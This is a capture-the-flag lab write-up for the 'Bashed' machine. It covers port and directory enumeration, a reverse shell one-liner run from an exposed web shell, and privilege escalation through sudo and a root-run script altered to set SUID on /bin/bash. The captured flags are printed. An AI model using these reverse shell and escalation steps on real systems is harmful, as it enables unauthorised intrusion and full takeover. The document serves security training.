Bashed
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Mar 7 21:31:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.68
Host is up (0.065s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
# Nmap done at Mon Mar 7 21:31:26 2022 -- 1 IP address (1 host up) scanned in 16.14 secondsAs we see, only port 80 (HTTP) is open. Let's try to obtain more information about the service and version running on that port.
nmap -sC -sV -p80 10.10.10.68 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Mar 7 21:32:12 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 7 21:32:21 2022 -- 1 IP address (1 host up) scanned in 8.98 secondsLet's take a look at the website.
Doesn't have much going on. Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/07 21:44:27 Starting gobuster in directory enumeration mode
===============================================================
/php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/server-status (Status: 403) [Size: 299]
===============================================================
2022/03/07 21:46:17 Finished
===============================================================Exploitation
If we take a look at the /dev directory, we should see a few PHP files.
If we click on the phpbash.php file, basically we will find a webshell.
Let's get a reverse shell. First, let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Then on the webshell we'll have to execute the following to get a shell and be able to get the user flag.
bash -c "bash -i >%26 /dev/tcp/10.0.0.1/8080 0>%261"
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 39324
bash: cannot set terminal process group (762): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ whoami
whoami
www-data
bash-4.3$ cat /home/arrexel/user.txt
cat /home/arrexel/user.txt
2c281f318555dbc1b856957c7147bfc1Privilege Escalation
Let's start the privilege escalation phase by listing the sudo privileges of the www-data user.
sudo -l
-llist user privileges.
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALLWe can execute any command as the scriptmanager user. Let's get a shell as the scriptmanager user.
sudo -u scriptmanager bash
bash-4.3$ whoami
whoami
scriptmanagerIf we list the files that have scriptmanager as owner user, we will see the test.py file in the /scripts folder. And if we look inside the folder, we'll see another file owned by root.
ls -l /script
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 43 Mar 7 13:49 test.py
-rw-r--r-- 1 root root 12 Mar 7 13:48 test.txtLet's see the content of the test.py and test.txt file.
cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.closecat /scripts/test.txt
testing 123!There must be some sort of scheduled task executed by root which runs the test.py script. The idea here is to change the /scripts/test.py script and make it give the /bin/bash binary the SUID permission, so when root executes it, bash permissions will change.
nano /scripts/test.py
import os
os.system("chmod +s /bin/bash")Now all we have to do is wait until the /bin/bash binary has the SUID permission activated.
ls -l
-rwsr-sr-x 1 root root 1037528 Jun 24 2016 /bin/bashFinally, all we have to do is execute bash with the owner permissions, and reap the harvest and take the root flag.
bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2Last updated
Was this helpful?